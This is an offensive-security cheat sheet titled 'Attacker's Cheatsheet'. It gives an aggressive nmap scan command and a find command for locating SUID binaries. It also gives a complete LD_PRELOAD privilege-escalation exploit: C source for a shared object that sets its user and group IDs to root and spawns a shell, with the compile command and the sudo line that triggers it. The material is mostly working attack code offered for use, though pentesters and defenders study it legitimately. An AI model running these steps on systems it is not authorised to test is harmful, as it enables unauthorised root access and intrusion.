Attacker's Cheatsheet
- (recon//scan): Robust host discovery and scanning with
nmap:
$ sudo nmap -T5 --stats-every 60s --log-errors --reason --randomize-hosts \
-v -n -PE -PM -PO -PU -sS -sV –oA scan_results ${TARGETS?}
This requires Sudo because of the UDP ping scan (flag -PU). Also, it is using -T5 so it is pretty aggressive. For a stealthier version, use lower values.
- (privesc//linux): Find files with SUID bit:
$ find / -perm -4000 -type f 2> /dev/null
- (privesc//linux): Dynamic Linker Hijacking using
LD_PRELOAD:
Compile the following C program as a shared object:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
And then exploit a vulnerable binary:
$ sudo LD_PRELOAD=/tmp/shell.so /bin/ls
Related: